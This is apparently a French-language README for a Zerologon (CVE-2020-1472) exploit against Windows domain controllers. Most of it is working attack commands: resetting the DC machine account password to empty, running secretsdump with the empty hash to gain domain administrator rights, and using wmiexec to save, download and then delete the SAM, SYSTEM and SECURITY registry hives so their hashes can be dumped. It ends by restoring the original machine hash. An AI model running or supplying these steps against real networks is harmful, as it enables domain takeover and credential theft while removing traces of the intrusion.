
Exploit pour zerologon cve-2020-1472
Code d'exploitation basé sur https://www.secura.com/blog/zero-logon et https://github.com/SecuraBV/CVE-2020-1472. Recherche et scanner originaux par Secura, modifications par RiskSense Inc.
Pour exploiter, supprimez toutes les installations précédentes d'Impacket que vous avez et installez Impacket depuis https://github.com/SecureAuthCorp/impacket/commit/b867b21 ou une version plus récente. Ensuite, faites :
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
Si cela réussit, vous pourrez alors :
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'
ce qui devrait vous donner les droits d'administrateur du domaine. Après avoir obtenu cela, utilisez wmiexec.py sur le DC cible avec un identifiant provenant du secretsdump et faites :
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
Ensuite, vous pouvez
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Et cela devrait vous montrer le hash NT original du compte machine. Vous pouvez ensuite réinstaller ce hash original du compte machine dans le domaine en utilisant
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
Réinstaller le hash original est nécessaire pour que le DC continue à fonctionner normalement.